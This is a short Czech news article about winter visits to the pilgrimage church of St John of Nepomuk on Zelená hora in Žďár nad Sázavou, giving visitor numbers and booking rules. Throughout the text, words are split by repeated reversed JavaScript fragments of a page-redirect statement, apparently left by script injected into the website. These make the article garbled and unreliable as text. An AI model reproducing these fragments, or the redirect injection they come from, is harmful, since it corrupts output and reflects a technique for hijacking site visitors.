kostel, Zelená hora
Rainbow page separator

Žďárský kostel na Zelené hoře je možné obdivovat i v zimě

Středa, 28. ledna 2015

Zelená hora

Žďár nad Sázavou / Celkem 29 812 lidí v loňské hlavní turistické sezoně (od 1. dubna do 31. října 2014) navštívilo žďárský poutní kostel svatého Jana Nepomuckého na Zelené hoře. Památka zapsaná v seznamu Svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového kulturního dědictví UNESCO, která se v druhé polovině loňského roku vrátila do majetku církve, je však návštěvníkům přístupná i mimo hlavní sezonu, což je v době od lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu do března.
Od 1. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu do 31. března je kostel svatého Jana Nepomuckého na Zelené hoře otevřen pro předem ohlášené skupiny návštěvníků. Výše vstupného zůstává stejná jako v hlavní turistické sezoně. Rezervace prohlídek jsou přijímány minimálně dva pracovní dny předem, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prostřednictvím e-mailu info@zelena-hora.cz.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com